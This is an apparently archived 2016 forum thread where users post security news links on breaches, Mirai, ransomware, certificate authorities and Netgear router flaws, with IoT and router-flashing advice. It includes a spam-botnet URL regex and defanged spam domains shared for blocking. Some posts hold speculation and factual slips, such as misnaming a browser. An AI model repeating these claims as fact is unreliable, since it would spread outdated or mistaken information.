https://www.leakedsource.com/blog/weebly/
Interesting when WOT doesn't trust/like leakedsource.com.
One thing for sure when I come across sites like this there is absolutely no way I would check user name and passwords. As soon as you do that you have pretty much compromised your information and can't/shouldn't use that data again.
Who would trust that the data wouldn't be harvested, certainly not me and I'm a trusting sort NOT.
I won't even use sites to check the strength of my passwords, for the very same reasons.
-
Hi DavidR,
Striking again that a Russian source seems to come with a bad web reputation,
lots of that demonizing going on lately.
The leakedsource dot com organization is into data harvesting, so it sits on big pile of cloud data.
At the moment for whatever reason there is a concerted action going on to make Russia look like the evil empire of cyberwarfare?
In this case: JSC DBA RU-CENTER, privacy protection service.
Comodo Certification - PositiveSSL Multi-Domain,Domain Control Validate seems OK.
What is CloudFlare's role in all this.
The bad side of it all is that CloudFlare seems indifferent to what they have in that cloud traffic they are facilitating.
The good, the bad and the ugly as long as it brings them big profits.
Big data cloud security is bad.
For the majority of big enterprise do not have protection as it should be implemented.
This will not be the last of such big data-breaches, where and when we may find them.
polonus
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
WTF >:(!!! For one of my uni papers at my institute uses weebly as a source for giving us (students) lecture notes, notices, timetable, and etc etc. I will pass this info to my uni IT support and let them know. Thanks Asyn for posting this
You're welcome. :)
-
Unprotected IoT devices killed the US Internet for hours
http://www.bitdefender.com/box/mirai-IOT-security-alert.html
-
Locky Adds Support for a New "S**T" Extension
Security researcher MalwareHunterTeam tells Softpedia that the infamous Locky ransomware has returned today with a new spam campaign that's spreading a new version of the ransomware.
http://news.softpedia.com/news/locky-adds-support-for-a-new-s-t-extension-509588.shtml (http://news.softpedia.com/news/locky-adds-support-for-a-new-s-t-extension-509588.shtml)
-
There are being warnings given out about a new spam botnet.
Important is the advice that shortened urls in an e-mail should always be frowned upon as suspicious.
Do not click such links.
Here is the information link given on a Dutch news forum, use Google translate to be able to read on this new spam botnet:
https://www.security.nl/posting/490176/Nieuw+spam+botnet%3F
Be aware of the obfuscated 146&........ look out for patters like e.g. 146&AGTfVq or 146&cc4by etc. in the URL address link.
This could create a handle for blocking this smut-spam
with domain names found to be like:
-hookupclub4[.]com
-flirthookup5[.]com
-flirthookup6[.]com
-flirthookup4[.]com
-claimyourprize2[.]com
-claimyourprize1[.]com
-Info credits here go to : SecGuru_OTX & NSG
polonus
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
WTF >:(!!! For one of my uni papers at my institute uses weebly as a source for giving us (students) lecture notes, notices, timetable, and etc etc. I will pass this info to my uni IT support and let them know. Thanks Asyn for posting this
You're welcome. :)
@Asyn: It's all good. The IT department at my uni, they knew about this problem and had already taken precautions. Thanks again :)
-
Trying to halt Mirai through a security hole: https://www.invincealabs.com/blog/2016/10/killing-mirai/
link author = Scott Tenaglia.
pol
-
Effective regular expression to be used against new spam botnet:
/[a-z]+\.php\?[a-z]\=146\&[\w]+\=[\w]+\&J9p\=[\w]{3}\&/
Spambot linked to SEO Spam and social media abuse, zie https://www.mywot.com/en/scorecard/urlrate.net?utm_source=addon&utm_content=popup
The important Joomla update seems almost too late for mentioned website, re: code error: undefined function window.addEvent -> htxp://tivaen.com/templates/ZAjax_Temp/js/roksortable.js
info credits security.nl anonymous posts 25-10-2016, 01:05 & Yesterday, 21:28
Remarkable is that people who have ISP mail accounts with good and decent working spam filters might not see it
or may get it only as junk mail ready to be deleted. I for instance have not seen these mails with obfuscated shortened url link spam.
pol
-
Inside the Gootkit C&C server
https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/ (https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/)
-
The Super-Dangerous Rex Botnet Has Only Around 150 Bots
http://news.softpedia.com/news/the-super-dangerous-rex-botnet-has-only-around-150-bots-509768.shtml (http://news.softpedia.com/news/the-super-dangerous-rex-botnet-has-only-around-150-bots-509768.shtml)
-
AtomBombing: A Code Injection that Bypasses Current Security Solutions
http://blog.ensilo.com/atombombing-a-code-injection-that-bypasses-current-security-solutions
-
Grand scale attacks on outdated Joomla almost a certainty. according to Sucuri's:
https://blog.sucuri.net/2016/10/joomla-mass-exploits-privilege-vulnerability.html
This is so for those who haven't found this Joomla update icon yet:
https://docs.joomla.org/Where_is_the_auto_update_for_Joomla%3F
polonus
P.S. How to block malicious account creation for vuln. Joomla: https://github.com/fcoulter/accountblocker
-
The Internet of Things Ecosystem is Broken. How Do We Fix It?
http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/
-
The Internet of Things Ecosystem is Broken. How Do We Fix It?
http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/
I think that when the IoT (idea) came into being there was little or no thought given to security.
There is no way I would give internet access to a bloody fridge, etc. I have a so called Smart TV (and that is over 7 years old) and there is absolutely no way I would hook it up to the internet.
-
The Internet of Things Ecosystem is Broken. How Do We Fix It?
http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/ (http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/)
I think that when the IoT (idea) came into being there was little or no thought given to security.
There is no way I would give internet access to a bloody fridge, etc. I have a so called Smart TV (and that is over 7 years old) and there is absolutely no way I would hook it up to the internet.
I have a chrome device hooked into one TV and enjoy some of the smart things available on the new "smart TV".
Different strokes for different folks. :)
-
I have mye TV, Blueray player online so i get software updates +Apple TV and cableTV box to recive all features like Netflix and movie rent
-
Adblock the NSA
https://www.nsaneforums.com/topic/279916-ublockadblock-filters-for-known-exploit-servers/
-
Some things you can do securing your iOT devices at Home.
First and formeost use Avast solutions to protect your Wifi.
I do and I haven't regret that decision since. Would not use my Android without it.
1. Do not take iOT devices to your workplace, for instance your Bluetooth music watch.
2. Create a separate guest network for iOT devices on your wifi home network.
2. a Check using Wireless Network Watcher for instance to see what's on there.
3. Only plug those devices into the network that you cannot do without.
4. Update, upgrade and patch the firmware of all iOT devices.
5. Disable UPnP, so your devices are not exposed on the Interwebs.
5.a Check for this using Shodan search engine for instance, or dork searches.
6. Alter the default passwords. Pick good secure passwords and hand a different one to all and every device.
7. Always be wary of cloud services and establish the security thereof. Use secure connections.
8. Keep your "landline"open in any case of a major emergency. Never trust anything outside your network.
9. Disable wifi and bluetooth services whenever there is no need for it.
Then these services should be off.
polonus
-
Disclosing vulnerabilities to protect users
https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
-
Microsoft not happy with Google disclosing major Windows bug - Web giant says no fix or advisory has been issued even though it reported the flaw 10 days ago.
https://www.cnet.com/news/microsoft-unhappy-with-google-disclosing-major-windows-bug-security/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem:+Trending+Content&utm_content=58180fbe89b9830007afc76a&utm_medium=trueAnthem&utm_source=facebook
-
Microsoft not happy with Google disclosing major Windows bug - Web giant says no fix or advisory has been issued even though it reported the flaw 10 days ago.
https://www.cnet.com/news/microsoft-unhappy-with-google-disclosing-major-windows-bug-security/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem:+Trending+Content&utm_content=58180fbe89b9830007afc76a&utm_medium=trueAnthem&utm_source=facebook (https://www.cnet.com/news/microsoft-unhappy-with-google-disclosing-major-windows-bug-security/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem:+Trending+Content&utm_content=58180fbe89b9830007afc76a&utm_medium=trueAnthem&utm_source=facebook)
Only effects 32 bit systems.
-
Google now like Mozilla no longer to trust WhoSign & StartCom certification.:
https://security.googleblog.com/2016/10/distrusting-wosign-and-startcom.html
Also read here on certificate transparency: https://www.certificate-transparency.org/what-is-ct
Apart from what we read there, there seems more insecurity coming from SSL证书_HTTPS加密_SSL数字证书 - 沃通CA【官网】
Only when we check here we see that the certificate is installed correctly: https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp
Certificate information
This server uses an Extended Validation (EV) certificate. Information about the site owner has been fully validated by WoSign CA Limited to help secure personal and financial information.
Common name:
www.wosign.com
SAN:
www.wosign.com, wosign.com, xn--buw427e.xn--fiqz9s, xn--buw427e.xn--fiqs8s, xn--buw427e.cn, xn--buw427e.com, wosign.tw, www.wosign.tw, wosign.us, www.wosign.us, wosign.hk, www.wosign.hk, wosign.com.hk, www.wosign.com.hk, wosign.com.cn, www.wosign.com.cn, wosign.cn, www.wosign.cn
Valid from:
2016-Feb-24 07:24:45 GMT
Valid to:
2018-Apr-24 07:24:45 GMT
Certificate status:
Valid
Revocation check method:
OCSP
Organization:
WoSign 沃通电子认证服务有限公司
Organizational unit:
City/locality:
深圳市
State/province:
广东省
Country:
CN
Certificate Transparency:
Embedded in certificate
Serial number:
28a6d32c2b971b896cd0de9477fd2a06
Algorithm type:
SHA256withRSA
Key size:
2048
Certificate chainShow details
Certification Authority of WoSignIntermediate certificate
WoSign Class 4 EV Server CA G2Intermediate certificate
www.wosign.comTested certificate
Server configuration
Host name:
211.151.125.105
Server type:
Microsoft-IIS/7.5
IP address:
211.151.125.105
Port number:
443
Protocols enabled:
TLS1.2
TLS1.1
TLS1.0
Protocols not enabled:
SSLv3
SSLv2
Secure Renegotiation:
Enabled
Downgrade attack prevention:
Not Enabled
Next Protocol Negotiation:
Not Enabled
Session resumption (caching):
Enabled
Session resumption (tickets):
Not Enabled
Strict Transport Security (HSTS):
Not Enabled
SSL/TLS compression:
Not Enabled
Heartbeat (extension):
Not Enabled
RC4:
Not Enabled
OCSP stapling:
Enabled
Vulnerabilities checked:
Heartbleed
Poodle (TLS)
Poodle (SSLv3)
FREAK
BEAST
CRIME
Cipher suites enabled:
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000A)
TLS_RSA_WITH_AES_128_CBC_SHA (0x002F)
TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
TLS_RSA_WITH_AES_128_CBC_SHA256 (0x003C)
TLS_RSA_WITH_AES_256_CBC_SHA256 (0x003D)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xC013)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xC027)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xC028)
But here where we see it go wrong: https://asafaweb.com/Scan?Url=https%3A%2F%2Fwosign.com
with a custom errors: Fail and excessive headers warning and a clickjacking warning.
The F-Status here is not building more confidence either: https://observatory.mozilla.org/analyze.html?host=wosign.com
as is this one here: https://sritest.io/#report/8353f268-5c60-4145-9d50-d22f5ba5f7f2
Retirable jQuery library: -https://wosign.com
Detected libraries:
jquery - 1.11.3 : (active1) -https://wosign.com/JS/jquery-1.11.3.min.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected
Others could check similarly on StartCom. I doubt the situation is very much different from that at WhoSign's.
polonus (volunteer website security analyst and website error-hunter)
-
Digital virus outbreak in British hospitals has serious consequenses: http://www.nlg.nhs.uk/
See warning on that page.
polonus
-
Interesting read on how to discriminate between normal enterprise use of TSL and cybercriminal malware use of it:
https://arxiv.org/pdf/1607.01639v1.pdf
Paper presented by Blake Anderson Cisco, Subharthi Paul Cisco & David McGrew Cisco
Read how specific malware stands out, where/when it is more one-sided, why tor is more of a client used in malware delivery, assymetrical versus symmetrical use of encryption, prevailing encryption patterns etc.
For the researching minds among us this is yummy yummy stuff.
You should read it and draw conclusions.
polonus (volunteer website security analyst and website error-hunter)
-
Digital virus outbreak in British hospitals has serious consequenses: http://www.nlg.nhs.uk/
See warning on that page.
polonus
Well it has been known that you could get an infection when you are in hospital, but I don't think that this virus is what they/you were expecting.
Whilst they don't give any details on the major incident as to why outpatients, operations, etc. would need to be cancelled.
-
New IoT-malware infests 3500 devices within 5 days.
Read: http://blog.malwaremustdie.org/2016/10/mmd-0059-2016-linuxirctelnet-new-ddos.html
Disable telnet to prevent infection.
polonus
-
Disclosing vulnerabilities to protect users
https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
Our commitment to our customers’ security
https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/
-
Have a vulnerable Joomla controller and want to block malicious account creation:
https://github.com/fcoulter/accountblocker (licensed by fcoulter - credits to Sucuri's Daniel Cid for finding it)
polonus
-
Websites from hosting provider Wix.com vulnerable through customized XSS malware via a DOM XSS hole.:
-https://www.contrastsecurity.com/security-influencers/dom-xss-in-wix.com *
Your avast webshield may alert on that link page *, but there is no real payload there ,
however for security reasons I decided to break the link. Going out there is your own responsibility!
Anyway when we report links it is always a good policy to break 'em.
Opening them later does not demand rocket technology, and visitors are free from accidently clicking such links initially.
polonus (volunteer website security analyst and website error-hunter)
-
Perhaps the most powerful botnet ever seen.
Entire Internet in a country down due to a DDos attack.
https://medium.com/@networksecurity/shadows-kill-mirai-ddos-botnet-testing-large-scale-attacks-sending-threatening-messages-about-6a61553d1c7#.j0fb8fkiz
-
Hi Eddy,
A real growing threat those new botnets endangering the infrastructure of the Interwebs now. >:(
Akamai will now stop using insecure SHA1 shortly: https://blogs.akamai.com/2016/11/planning-for-the-end-of-2016-a-leap-second-and-the-end-of-support-for-sha-1-tls-certificates.html
Check domains for insecure SHA1 (that shouldalready have been phased out Jan. last) here:
https://shaaaaaaaaaaaaa.com/
Damian aka polonus
-
New Bizarro Sundown Exploit Kit Spreads Locky
http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/
-
Mirai Botnet Strikes Again to Take Liberia Offline
http://www.infosecurity-magazine.com/news/mirai-botnet-strikes-again-to-take/ (http://www.infosecurity-magazine.com/news/mirai-botnet-strikes-again-to-take/)
-
INSIDE THE RIG EXPLOIT KIT
https://threatpost.com/inside-the-rig-exploit-kit/121805/ (https://threatpost.com/inside-the-rig-exploit-kit/121805/)
-
Is it a good idea to let GCHQ tinker with BGP and SS7 protocols and apply changes to get as they say
a better protection against IP spoofing and dDos attacks at ISPs?
SS7 protocol for instance is holed and often comes not securely implemented, read about that from the mappers here:
http://labs.p1sec.com/2014/12/28/ss7map-country-risk-ratings/
But can we trust British Signal Intelligence, aka GCHQ-fox with our chicken?
They even might be after new ways to privacy leaks, like badly protected: privacyleak aka leak_locationcell, leak_privateinfos, net_homerouting, leak_authvectors, leak_subscriberplan, net_homerouting_defeated_ati, net_homerouting_defeated_psi & leak_location. Info credits for this article go out to: Laurent Ghigonis
Will this not mean more surveillance in the end for end-users under a better controlled undisturbed condition scheme?
Think again....or read: http://securityaffairs.co/wordpress/39409/cyber-crime/ss7-flaw-surveillance.html
polonus
-
Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb16-37.html
-
Microsoft Security Bulletin Summary for November 2016
https://technet.microsoft.com/library/security/ms16-nov
-
Protecting users from repeatedly dangerous sites
https://security.googleblog.com/2016/11/protecting-users-from-repeatedly_8.html
I hope they also will maintain something like a "3 strikes and you are out" policy or..
first offend - 1 month out
second offend - 3 months out
third offend - out for ever
-
Antivirus Fails to Stop Ransomware 100% of the Time
http://www.infosecurity-magazine.com/news/antivirus-fails-to-stop-ransomware/ (http://www.infosecurity-magazine.com/news/antivirus-fails-to-stop-ransomware/)
-
OpenSSL Security Advisory [10 Nov 2016]
https://www.openssl.org/news/secadv/20161110.txt
-
Is facebook rewarding cybercriminals here?:
Facebook buys black market passwords to keep your account safe
https://www.cnet.com/news/facebook-chief-security-officer-alex-stamos-web-summit-lisbon-hackers/
polonus
-
Data breach on 421 million users:
https://www.leakedsource.com/blog/friendfinder
making this the largest hack of 2016.
The password 123456 brought 900.000 hits,
and so is the most popular and most insecure password of the planet. ::)
Your security out of the window before you can count to ten ;D
polonus
-
It's always nice when you see a massive breach like this and know you aren't in any way effected. :)
-
Threats on smartdevices mapped out for you.
'In order to fully address the inherent threats of mobile devices, a wider view of the mobile ecosystem is necessary. This repository contains the Mobile Threat Catalogue, which describes, identifies, and structures the threats posed to mobile information systems. Readers of the catalogue will notice there are gaps; some threats are not tied to a documented source or lack countermeasures, and other threats not identified here may exist. The National Cybersecurity Center of Excellence (NCCoE) seeks comment on current mobile threats addressed in the Catalogue as well as ideas for additional threats to add...........'
See: https://pages.nist.gov/mobile-threat-catalogue/
info link credits go to: cowboysec.
My advice to mitigate would be : https://daplie.github.io/browser-authenticator/ & https://www.authy.com/app/mobile/
polonus
-
700 million mobile phones may have phoned home to Shanghai: http://www.prnewswire.com/news-releases/kryptowire-discovered-mobile-phone-firmware-that-transmitted-personally-identifiable-information-pii-without-user-consent-or-disclosure-300362844.html
pol
P.S. Funny as there is nothing here: http://toolbar.netcraft.com/site_report?url=http://bigdata.adups.com
Just the index default page and this for all the addresses Kryptowire discusses. Just the welcome to nginx/1.8.0. (port 80 (with a 404) and 443 only)
Is this some demonizing?
Certification for adups dot com - Root installed on the server. Global Trust CA & Rapid SSL256 -CA -G3
For best practices, remove the self-signed root from the server.
Registrar - Alibaba Group China aka Bo Zhang Store.
D
-
(http://screencast-o-matic.com/screenshots/u/Lh/1479328602176-74351.png)
http://blog.pch.com/blog/2013/04/05/5-ways-to-know-if-its-a-publishers-clearing-house-scam/ (http://blog.pch.com/blog/2013/04/05/5-ways-to-know-if-its-a-publishers-clearing-house-scam/)
I just received one of these phone calls here in New Mexico. So the scammers are out there. Don't send any money and,
Sorry you're not a winner. You will be a big looser if you fall for this.
-
Locky Ransomware being Distributed through Fake Flash Player Update Sites
http://www.bleepingcomputer.com/news/security/locky-ransomware-being-distributed-through-fake-flash-player-update-sites/ (http://www.bleepingcomputer.com/news/security/locky-ransomware-being-distributed-through-fake-flash-player-update-sites/)
-
Billion-Dollar Scams: The Numbers Behind Business Email Compromise
http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/billion-dollar-scams-the-numbers-behind-business-email-compromise
-
Why Ghostery facilitates Google's profiling to be more profound?
Using Ghostery extension will enable Google to even better and more uniquely profiling you,
combining your use of the extension and other tracking and fingerprinting vectors.
Bad for the over one million users of the extension.
Check your browser here: https://panopticlick.eff.org/
You wanna read on this fingerprinting with Ghostery,
go to : https://blog.securitee.org/?p=277
A better extension to use is Tracker SSL telling you where,
insecure IDs tracking continues on "secure" SSL-websites.
Think that extensions are only tolerated in Google's Webshop,
when they do not interfere with Google's main income flow (ads and data-selling)
Firefox also does not much towards better end-user privacy,
despite of the fact they have all it takes under the hood in about:config.
Could it be they won't loose Google sponsoring their browser?
Check your factial tracking on certain websites here and you might feel shocked about the results:
https://tools.digitalmethods.net/beta/trackerTracker/
polonus
-
Why Ghostery facilitates Google's profiling to be more profound?
Using Ghostery extension will enable Google to even better and more uniquely profiling you,
combining your use of the extension and other tracking and fingerprinting vectors.
Bad for the over one million users of the extension.
<snip>
I tried Ghostery a long time ago when it first came out (and I think you were promoting it), I never really liked it as it conflicted with one of my other add-ons. I preferred to stick with my security add-ons NoScript and RequestPolicy. Cookie Monster is another handy add-on to control cookies.
The main issue with some of these so called security add-ons is they require a degree of user management and that puts off many users.
So looks like I dodged that bullet.
-
A lot ado about loosing the last remnants of our privacy.
Two new browsers with privacy at heart launched recently.
(We of course all know and have Avast SafeZone browser on the desktop).
New promising concepts are Firefox Focus versus Blaze.
Allthough the CEO at Blaze is being criticized for his Christian fundamental constitutional views,
he still is the inventor of Javascript and i.m.h.o. did a fine job on Blaze (Win64).
For Android I like his Blaze LinkBubble app.
The only "?" for such browsers is you cannot choose a privacy friendly search engine,
that forms a good alternative to google,
which search engine again turns the browser in one big ongoing tracking and profiling machine.
With Google it is like the Eagles sang: "You can check in but never leave".
polonus
-
Ask dot com toolbar, long by some considered to be a kind of adware on its own,
now has been hacked by malcreants to spread malware.
Read: https://blog.redcanary.com/ask-partner-network-compromise
polonus
-
Word Press update scheme insecure
Read: http://www.openwall.com/lists/oss-security/2016/11/21/3
Tips for WP admins: https://paragonie.com/blog/2016/10/guide-automatic-security-updates-for-php-developers#elements-automatic-updates
and http://www.openwall.com/lists/oss-security/2016/11/21/7
link info credits: Scott Arciszewski.
Test here: https://hackertarget.com/wordpress-security-scan/
and enabled by Sucuri's: https://wpscan.org/
and personal scan: http://www.scanwp.com/
polonus
-
As more of EU-countries want a grab in the cloud data for surveillance, without even having to put in a Mutual Legal Assistance Treaty request,
it is high time to improve on general cloud protection.
With all the data breaches and the questionable security status of a greater part of the know CDNs, cloudsecurity is at stake.
polonus
-
Some advise that you should switch to SAFE Linux. :o
Maybe not so safe ???
Elegant 0-day unicorn underscores “serious concerns” about Linux security (http://arstechnica.com/security/2016/11/elegant-0day-unicorn-underscores-serious-concerns-about-linux-security/)
-
Hi bob3160,
Could you mention anything completely safe or secure in life? ;D
I can not.
polonus
-
Hi bob3160,
Could you mention anything completely safe or secure in life? ;D
I can not.
polonus
"Alice" :)
-
Hi bob3160,
Could you mention anything completely safe or secure in life? ;D
I can not.
polonus
"Alice" :)
Nothing better than a loving spouse. ;)
-
Installing the wrong extension could open your browser up to browser hijacking.
Hotspot Shield Free VPN Proxy, I wonder whether that one is safe?
Google may warn you: https://nakedsecurity.sophos.com/2014/02/06/google-chrome-will-warn-you-when-its-been-hijacked/
polonus
-
Cerber Ransomware 5.0 Released with a Few Changes
http://www.bleepingcomputer.com/news/security/cerber-ransomware-5-0-released-with-a-few-changes/ (http://www.bleepingcomputer.com/news/security/cerber-ransomware-5-0-released-with-a-few-changes/)
Hope avast ready to deal with this. ;)
-
Mirai botnet targets Deutsche Telekom routers in global cyberattack
https://www.engadget.com/2016/11/29/mirai-botnet-targets-deutsche-telekom-routers-in-global-cyberatt/
http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/
http://www.infoworld.com/article/3145883/security/the-new-mirai-malware-strain-has-gone-beyond-deutsche-telekom.html
-
0-day exploit in Firefox (Windows)
http://arstechnica.com/security/2016/11/firefox-0day-used-against-tor-users-almost-identical-to-one-fbi-used-in-2013/
Makes you wonder how Mozilla "fixed" it 3 years ago... :-\
-
Hi Eddy,
Everybody knows that to be really secure using tor, one should not enable javascript in the tor-browser.
Whenever your privacy is on the line, the situation we live in to-day means not to go online or risk to loose your anon/privacy.
Also rather would see uMatrix come to tor than noscript of older tor- firefox browser versions used as tor-fork (5 versions behind?!?)
Idiotic that tor-users work tor built on a firefox 45 version. Absurd.
Wonder normal firefox is also affected by this exploit in the on-going battle between end-users
versus governmental, commercial and cybercriminal surveillance-snoopers.
polonus
-
More Than 1 Million Google Accounts Breached by Gooligan
http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan
As for the Firefox issue, it seems to effect all versions.
-
<snip>
As for the Firefox issue, it seems to effect all versions.
All versions that are actually using TOR that is.
-
Hi DavidR & Eddy,
Regular firefox and the tor browser has been updated to patch that hole.
Tor browser goes to version 6.0.7 and Firefox to version 50.0.2.
More info on Tor can be had here: https://blog.torproject.org/blog/tor-browser-607-released
polonus
-
Hi DavidR & Eddy,
Regular firefox and the tor browser has been updated to patch that hole.
Tor browser goes to version 6.0.7 and Firefox to version 50.0.2.
More info on Tor can be had here: https://blog.torproject.org/blog/tor-browser-607-released
polonus
Yes, just updating to 50.0.2 now.
-
Firefox SVG Animation Remote Code Execution (FF/FF ESR/TB)
https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/
-
Tech support scammers up their game with ransomware (UPDATED)
https://blog.malwarebytes.com/threat-analysis/2016/11/tech-support-scammers-up-their-game-with-ransomware/
https://www.neowin.net/news/ransomware-connects-victims-to-fake-microsoft-technicians-to-have-their-files-decrypted
-
6700 webshops infested with Magento mage.jpg malware:
https://gwillem.gitlab.io/2016/12/01/visbot-malware-on-6691-stores-analysis/
Re: http://www.snapfast.com/blog/magento-mage-jpg-hack/
Infested webshops use Magento and have not installed a vital security update: https://www.security.nl/posting/448375/Magento%3A+gehackte+websites+hebben+update+niet+ge%C3%AFnstalleerd
More on visbot: https://www.bleepingcomputer.com/news/security/visbot-malware-found-on-6-691-magento-online-stores/
A creditcard with rotating CVV code seems the best protection scheme against such hard to detect malware.
High time for high tech cards to be rolled out.
polonus
P.S. Magento shop owners can scan here: https://www.magereport.com/
(info cedits go out to Willem de Groot)
-
Here the latest Willem de Groot list of compromised shops:
https://sritest.io/#report/a35c19be-bb83-4af9-b57a-2c2ef0936d17
-> https://gwillem.gitlab.io/ -> https://gitlab.com/gwillem/public-snippets/snippets/28813
polonus
-
Sh... IoT just got real: Mirai botnet attacks targeting multiple ISPs
http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/ (http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/)
Shamoon malware returns to again wipe Saudi-owned computers
http://www.theregister.co.uk/2016/12/02/accused_iranian_disk_wiper_returns_to_destroy_saudi_orgs_agencies/ (http://www.theregister.co.uk/2016/12/02/accused_iranian_disk_wiper_returns_to_destroy_saudi_orgs_agencies/)
-
Avast Releases Four Free Ransomware Decryptors
https://blog.avast.com/avast-releases-four-free-ransomware-decryptors
-
Google's Invisible CAPTCHA coming to a site near you!
: https://www.google.com/recaptcha/intro/comingsoon/invisible.html
More security through obscurity or meant as an advanced surveillance threat for the anonymous tor-user?
Hiding the captcha vault in plain sight, how long will it last before they have to think of something new?
polonus
-
Google's Invisible CAPTCHA coming to a site near you!
: https://www.google.com/recaptcha/intro/comingsoon/invisible.html (https://www.google.com/recaptcha/intro/comingsoon/invisible.html)
More security through obscurity or meant as an advanced surveillance threat for the anonymous tor-user?
Hiding the captcha vault in plain sight, how long will it last before they have to think of something new?
polonus
Is there something wrong with making it easier for the average user while making it harder on the bad guys ???
-
Not all users of the tor browser are bad guys, there are some very legit reasons to be using tor
(foreign journalists use it, you may use it when you do not want your insurance know about your searches
that will set your hospital bills unreasonably high).
To-day the mere reason that people use tor makes them suspect of doing something bad. To-day often one is guilty until one has proven oneself to be innocent. Strange Napoleontic interpretation of the law where one was innocent until proven guilty (tax laws exempt).
Funny is that it is always the not so bright tor-user that comes caught. The ones that do not follow the no javascript enable rule, that will use extensions to better set them out through their browser fingerprint. So the not so bright baddies are caught and rigthfully so.
You always should use tor within the frameworks of the law. I do not use it, but if I used it only as a law-abiding citizen and for legit reasons.
But I can imagine situations where people want some extra anonimity with tor.
polonus
-
New Ransomware Families to Rise 25% in 2017
http://www.infosecurity-magazine.com/news/new-ransomware-families-to-rise-25/ (http://www.infosecurity-magazine.com/news/new-ransomware-families-to-rise-25/)
-
GoldenEye Ransomware - possible Petya follow-up
http://sensorstechforum.com/fr/remove-goldeneye-ransomware-virus-decrypt-encrypted-hard-disks/ (http://sensorstechforum.com/fr/remove-goldeneye-ransomware-virus-decrypt-encrypted-hard-disks/)
-
IoT dolls spy on children or feed them with ad messages:
http://www.forbrukerradet.no/siste-nytt/connected-toys-violate-consumer-laws
You do not want to have your children being exposed to this,
and these invaders of your child's privacy should at least be punished for turning children into products.
What kind of parents allow their children to have such toys?
polonus
-
Dailymotion admits hack exposed millions of accounts
http://www.zdnet.com/article/dailymotion-hack-exposes-millions-of-accounts/
-
Dailymotion admits hack exposed millions of accounts
http://www.zdnet.com/article/dailymotion-hack-exposes-millions-of-accounts/
The only time that these companies are going to take responsibility for securing their systems (and customer data), is when they start getting heavy fines/punitive damages.
Currently there is no incentive for them to spend money securing their systems.
-
Seems a rather serious hole and it hasn't been patched until now:
http://www.zdnet.com/article/two-netgear-routers-are-vulnerable-to-trivial-to-remote-hack/
Users are adviced not to use mentioned NETGEAR routers.
polonus
-
Netgear heeft de laatste tijd wel heel vaak problemen met de veiligheid.
Hier is nog zo'n voorbeeld ervan.
http://kb.netgear.com/28393/NETGEAR-Product-Vulnerability-Advisory-ReadySHARE
-
Yep, it is all a question of money they do not wanna spend on it,
and we mean moral banktruptcy of firmware here,
that is why there is so many hacks an IoT malbots around.
Situation is not gonna change soon and we have to fend for ourselves, dear Eddy.
Change software to XWRT-Vortex seems to mitigate the problem (info credits: @tigs)
suswrt-Merlin (or XWRT or Cross-WRT) firmware for Netgear R7000 router.
At this point when you have a working version based on a Asuswrt-Merlin v380.63_2
that does not requires to flash the custom CFE. Firmware is pretty stable.
Download links:
XWRT for Netgear R7000 v380.63_2 is here
(previous versions are also available at this link)
Official site, Changelog. -> http://www.kb.cert.org/vuls/id/582384
The recommended procedure for initial flashing:
1. Reset your router to factory defaults via the web interface.
2. Flash the R7000_xxx.xx_x.chk file via the web interface.
3. Do another factory reset via the new web interface.
4. Configure everything else.
Procedure for upgrade:
1. Reboot your router via the web interface or power cycle.
2. Flash the R7000_xxx.xx_x.trx file via the web interface.
3. Check new options and configure everything else.
Link to the "back to stock" firmware (v1.0.3.80_1.1.38) is here.
Important: If You want to go away from XWRT back to tomato or dd-wrt
you MUST first flash the "back to stock" firmware image, or you will brick your router. :P
polonus
-
We live in times of large scale automated threats for the as per default firmware world.
Next up issue coming towards a router near you might be NAS-sing:
Read: https://wrgms.com/synologys-secret-telnet-password/
polonus
-
More on the Netgear routers
CERT > Multiple Netgear routers are vulnerable to arbitrary command injection >> https://www.kb.cert.org/vuls/id/582384
https://www.neowin.net/news/cert-advises-users-to-discontinue-use-of-two-netgear-routers-due-to-major-security-flaw
-
A temp fix: http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
Other netgear routers they may be vulnerable: Netgear R6400 (Also known as AC1750 Smart WiFi Router)
R7500 (Nighthawk X4 AC 2350)
R7800 (Nighthawk X4S Smart WiFi Gaming Router)
R8500 (Nighthawk X8 Tri-Nand WiFi Router)
R8000 (Nighthawk AC3200)
R9000 (Nighthawk AC7200 X10 Smart WiFi Router)
And the ever-polular R7000 & R7000p (Nighthawk AC1900)
pol
-
August: A Spy Trojan for All Seasons
